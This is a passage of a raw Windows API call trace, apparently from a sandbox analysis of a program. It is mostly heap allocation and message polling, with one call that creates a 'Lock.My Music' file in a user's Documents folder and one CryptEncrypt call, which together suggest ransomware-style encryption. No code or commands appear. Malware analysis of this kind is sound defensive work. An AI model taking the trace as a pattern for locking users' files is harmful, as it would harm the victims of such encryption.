Flags=0x0, Size=0x8) returned 0x24b1c28 [0264.391] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.391] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0264.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0264.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.391] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.My Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.my music"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0264.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0264.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0264.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0264.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0264.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0264.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.394] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0264.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.394] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0264.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0264.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0264.394] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0264.394] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.395] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0264.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0264.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.396] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0264.396] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.397] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0264.397] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.397] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0264.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0264.397] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.397] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0264.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.398] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.398] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.398] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0264.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.398] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.399] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0264.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.399] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0264.399] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.399] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0264.399] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.399] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.400] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.400] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.400] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0264.400] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.400] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.400] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0264.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0264.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0264.401] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.401] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0264.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.402] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.402] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.402] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0264.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.402] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0264.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0264.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.403] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0264.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0264.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0264.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0264.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0264.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0264.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0264.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0264.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0264.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0264.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0264.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0264.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0264.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0264.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0264.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0264.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0264.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0264.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0264.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0264.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0264.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0264.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0264.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0264.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0264.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0264.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 